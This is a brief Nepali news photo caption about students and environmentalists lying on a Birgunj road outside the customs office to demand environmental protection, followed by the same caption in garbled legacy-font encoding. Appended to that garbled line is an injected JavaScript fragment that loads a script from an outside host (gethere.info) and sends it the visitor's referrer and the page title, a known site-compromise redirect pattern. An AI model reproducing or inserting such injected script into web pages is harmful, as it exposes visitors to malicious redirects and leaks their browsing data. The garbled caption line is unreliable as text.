प्रकृति सेवा प्रतिष्ठान नेपालको अगुवाइमा शुक्रबार बिहान पर्यावरण संरक्षणको माग गर्दै वीरगन्जको इनर्वास्थित भन्सार कार्यालय अगाडिको मूल सडकमै सुतेर विरोध जनाएका विद्यार्थी तथा प्रकृतिप्रेमी । तस्बिर : रासस

;8sd} ;'t]/ k|b"if0fsf] lj/f]w k|s[lt ;]jf k|lti7fg g]kfnsf] cu'jfOdf z'qmaf/ laxfg kof{j/0f ;+/If0fsf] dfu ub}{ jL/uGhsf] Ogjf{l:yt eG;f/ sfof{no cufl8sf] d"n ;8sd} ;'t]/ lj/f]w hgfPsf ljBfyL{ tyf k|s[ltk|]dL . tl:a/ M laho s'df/ dxtf], k;f{, /f;;s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;